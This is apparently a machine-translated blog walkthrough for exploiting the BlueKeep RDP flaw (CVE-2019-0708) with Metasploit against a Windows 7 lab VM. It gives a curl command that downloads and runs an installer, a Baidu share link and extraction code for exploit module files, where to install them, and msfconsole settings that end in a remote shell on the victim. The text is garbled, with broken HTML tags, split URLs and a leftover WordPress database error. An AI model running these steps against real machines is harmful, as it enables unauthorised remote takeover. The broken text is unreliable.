CVE-2019-0708 Remote Desktop Code Execution Vulnerability

By Windows

vulnerability environment

Use VMware to install Windows7 SP1 to simulate the victim machine

Share a picture

Use

Preparation of attack tools

  • 1. Use the following command to update the installed metasploit framework with one click li> 
  • curl https://raw .githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall

  • 2. Download the attack kit in the reference and place the file in the corresponding folder of MSF (if a file with the same name already exists, just overwrite it)
  • rdp.rb-> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

    rdp_scanner.rb     -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

    cve_2019_0708_bluekeep.rb     -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

    cve_2019_0708_bluekeep_rce.rb     -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Share a picture

Attack command

Use msfconsole to display the framework that enters Metasploit

After the display enters, use reload_all< /code>Reload 0708rdp module and use

Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rce to enable 0708RDP module Attack

Use info to view tool related information and settings< /em>

share picture

It can be seen that the key settings are mainly RHOSTS\RPORT\target

Use< code>set RHOSTS victim machine IPSet victim machine IP

Use set RPORT victim machine PORTSet the RDP port number of the victim machine

Use set target ID number (optional 0-4) to set the machine architecture of the victim machine

Here we are using VMware, so goal 2 Meet the conditions

< em id="__mceDel">Use exploit to start the attack and wait for the connection to be established. After the connection is established, use Get Shell, and then use Get Interactive Shell to complete the attack immediately and successfully get the victim. Host permission

share picture

Reference

< h3>Link: https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZgExtraction code: ml9g 

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/con fig/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall

rdp.rb-> /opt/metasploit -framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

, , , , , ,

WordPress database error: [Table 'yf99682.wp_s6mz6tyggq_comments' doesn't exist]
SELECT SQL_CALC_FOUND_ROWS wp_s6mz6tyggq_comments.comment_ID FROM wp_s6mz6tyggq_comments WHERE ( comment_approved = '1' ) AND comment_post_ID = 5568 ORDER BY wp_s6mz6tyggq_comments.comment_date_gmt ASC, wp_s6mz6tyggq_comments.comment_ID ASC

Leave a Comment

Your email address will not be published.